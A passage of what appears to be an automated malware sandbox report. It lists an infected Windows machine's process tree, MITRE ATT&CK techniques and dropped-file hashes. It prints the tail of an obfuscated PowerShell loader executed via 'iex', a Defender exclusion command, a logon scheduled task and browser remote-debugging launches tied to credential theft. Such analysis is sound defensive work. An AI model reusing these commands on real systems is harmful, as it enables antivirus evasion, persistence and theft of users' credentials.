 n h h E A U W P z o g B z 4 Q Q n Q h J 1 s g G T s O I T s m O B 8 9 J l s o J T o c K i c X Q x 8 5 J l g W E T g i P S Y T K B c 5 J G E 8 I Q A I E z 8 L M 3 w Y J G E W I g M y X 2 Q N C R 8 + H A Q W O T s 9 D C Y Q K C U 9 H A U S e T g y U i Y U N y E l H 2 M 8 O T s y B 2 M L N H 0 2 D w c G H B Q j J j 0 N C j 4 6 J H E K I j g y W m c O G w s i J 3 F 9 e g o i L S o Y N h 8 9 J l t 1 O T s I L W M Y I w x o D H U W J A A y E y k Y J D 5 m D 3 E s I w M i B y c n M 3 g C H 2 4 K e Q A 9 I W M R J 3 h h H 2 4 O e w A y H D Q S I w w / E H A V M R c w W z 0 N C j 4 6 J H E K I j g y W m c O H A c 9 J g U W I T o L O R c g Q x s k I X U F c B A h L i Q N C j 4 6 J H E K I j g y W m c O G w s i J 3 F 9 e g s i P S c b J 3 g 6 E A U W I T o L O j Q S I w w 6 H 1 s C O j p X P m Q N C R 8 + H A Q W O T s 9 D C Y X Q x 8 5 J l g W E T g i P S Y T K B c 5 J G E 8 I Q A I E z 8 L N H 0 2 D 3 4 W M D 0 y P m Q N C R 8 + H A Q W O T s 9 D C Y U Q g s j H 2 A W P w w L P S Y L N H 0 2 D 3 4 W M D 0 y P m Q N C R 8 o J w U s e z s c K m o L M w Q 6 D n U W M T 0 i P S Y m K A N k C V o W I T p X H x w b J 3 w 9 D l M P L j 4 m I m Q N Q x 8 o I G U G f h Y c O T k g H X g / H 2 E w M R A h W z Q X H R s / J G 4 K e Q M 9 I i c X Q g M + H 2 E W e D s i P T g U N w s r J E 8 F P Q g y J W M j J 3 Q k D H U W P T h X D y U n K A g 2 C W A W M D g y D z 0 Y K A Q 2 F H U j I j g t J S M b Q x w i D H U W I g B W B y Y j G S Y 2 C W A G M D g y X j k j K A 8 5 J 3 U F I g A 9 B z 8 b H i V k I W U F P Q x X P W M m N y E k H w U J L h M i A z k Y N y E l I H U F P Q 8 i L S k j Q H g 5 J 2 E R L h M t I S U n O B c n D H V 1 H A A 9 J S E X N w t h J H U F I j w i B y k h H Q c / I X U F P Q s i P S k b Q w c h J n 4 W O T t X X z Q I N x s l I Q U W I A A c K i c Q H X Q o H A Q R f h Z X B z 4 L M y o 6 H A R x P A N X P S E h I y Y 2 I E 8 G J T w i B 2 M L N A w 2 I 2 U G J T s t J T 8 L O D 4 2 H 2 4 s O T 0 m K i s L O H 1 m I 2 U G I w A 9 O T k j M w 9 m D H E S f T g 9 O j Q P I w 9 o C g V 0 f g M 9 A y M m M w w p ' ; $ m u g l = ' E 6 D I Y e k S B p M Q ' ; $ j e u t h = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f l n l n ) ; $ q g w w d e = ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ ( f o r ( $ i = 0 ; $ i   - l t   $ j e u t h . L e n g t h ; $ i + + ) { $ j e u t h [ $ i ] - b x o r [ b y t e ] $ m u g l [ $ i % $ m u g l . L e n g t h ] } ) ) ) ; [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ q g w w d e ) ) | i e x 5⤵PID:5908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10127950101\packed.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:5312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2816
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /tn "COM Surrogate Task" /tr "C:\Program Files\runtime\COM Surrogate.exe" /sc onlogon /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5532
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe"C:\Users\Admin\AppData\Local\Temp\10127960101\bncn6rv.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4136 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
PID:8072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe57d1cc40,0x7ffe57d1cc4c,0x7ffe57d1cc585⤵PID:5484
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3052 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe49ae46f8,0x7ffe49ae4708,0x7ffe49ae47185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:25⤵PID:1628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:35⤵PID:1620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:85⤵PID:184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:15⤵
- Uses browser remote debugging
PID:1824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:15⤵
- Uses browser remote debugging
PID:5360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:25⤵PID:4360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:25⤵PID:6568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2872 /prefetch:25⤵PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2536 /prefetch:25⤵PID:4168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2520 /prefetch:15⤵
- Uses browser remote debugging
PID:5164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:15⤵
- Uses browser remote debugging
PID:7784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2500 /prefetch:25⤵PID:4500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4920 /prefetch:25⤵PID:5836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3420 /prefetch:25⤵PID:6488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,17433454205489691849,18437145168559362672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4064 /prefetch:25⤵PID:7244
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 24444⤵
- Program crash
PID:3060
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:8176 -
C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10127970101\mAtJWNv.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 8004⤵
- Program crash
PID:6324
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127980101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10127980101\HmngBpR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5192 -
C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7420 -
C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
PID:5140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127990101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10127990101\FvbuInU.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Users\Admin\AppData\Local\Temp\10128000101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10128000101\ADFoyxP.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2444 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat4⤵
- System Location Discovery: System Language Discovery
PID:4820 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat5⤵
- System Location Discovery: System Language Discovery
PID:6928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 47081⤵PID:3084
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4236 -ip 42361⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6480
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 8176 -ip 81761⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4136 -ip 41361⤵PID:5936
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
7Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
114KB
MD50ef27899243c792b7645a4f8ca777184
SHA134de718d559a8307db906f6fd74dbdc20eb6e745
SHA2566848e0220fb632a53168a0e99849784fd669e9d82da321d13d15f3dc6cd7c6bc
SHA5121f93f876c8c776af0745b1f29712db8d0373cc8e223d62f459f3f4abe017e2046e95eff78bbb5f754b0cd98c72d9a7b3e5b0c1868b42f79ae97d0ccab451bceb
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
10KB
MD5f7b5e5268c2acc835b9dde2b4fda7fe3
SHA14a787cbbc604b719477c3fee250e00c38898e9ff
SHA256afb631fc7e29584e2adf34cca8d10330ea6c12f5eca2453cdae56e85e1c9bcd8
SHA512d92575f8cb6b6da547af2d7dbb418eb7ddc129791de2e1f67f1ee6c78912e4344bb3a5690f742508b0365a88346f0fecc105f56e21a1f6f5f762a01ba1765696
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
40B
MD5fca79fb6982b039a708b48419b725fc3
SHA103b5dcf0e4762c73a4407c5261232fd8c7a640e2
SHA2567379dfffa6d218e67131438e37e898bd90face70a1a57f2e90bac25ec50477a8
SHA512443af87e83d272dd232a1dd0b91e38b587ef8d52e1d8d1c90bf56ef701eb1c7124fb028be5f35dbd89b97cd9f5e9a0df51306dcce6243f8959b87c910d7f0e86
-
Filesize
649B
MD58fe135d47fee65875eee84af6a895f81
SHA1b51b70bc26d8e137e479c0feb58c34140cd17411
SHA256dcae6effef1755ed1d627b4a8c803bc316d5273806986fe6980cc1cc50d15b3f
SHA5120af83f983a41f608cb66396af4c60f93e2e8680dfc520983dad42f33ebb77328489f7e8df5d122e6817903c340f44dbed8e1bdd92773e0092abb6fa4cf4ca568
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\_locales\en_US\messages.json
Filesize1KB
MD5578215fbb8c12cb7e6cd73fbd16ec994
SHA19471d71fa6d82ce1863b74e24237ad4fd9477187
SHA256102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1
SHA512e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\manifest.json
Filesize2KB
MD5c1650b58fa1935045570aa3bf642d50d
SHA18ecd9726d379a2b638dc6e0f31b1438bf824d845
SHA256fea4b4152b884f3bf1675991aed9449b29253d1323cad1b5523e63bc4932d944
SHA51265217e0eb8613326228f6179333926a68d7da08be65c63bd84aec0b8075194706029583e0b86331e7eeec4b7167e5bc51bca4a53ce624cb41cf000c647b74880
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\service_worker_bin_prod.js
Filesize127KB
MD5bc4dbd5b20b1fa15f1f1bc4a428343c9
SHA1a1c471d6838b3b72aa75624326fc6f57ca533291
SHA256dfad2626b0eab3ed2f1dd73fe0af014f60f29a91b50315995681ceaaee5c9ea6
SHA51227cb7bd81ed257594e3c5717d9dc917f96e26e226efb5995795bb742233991c1cb17d571b1ce4a59b482af914a8e03dea9cf2e50b96e4c759419ae1d4d85f60a
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD554381b45f42490380bcf6ff3903e2d08
SHA1450b22afc5b5c46ddf5317e98e2a7b6bc4c4f657
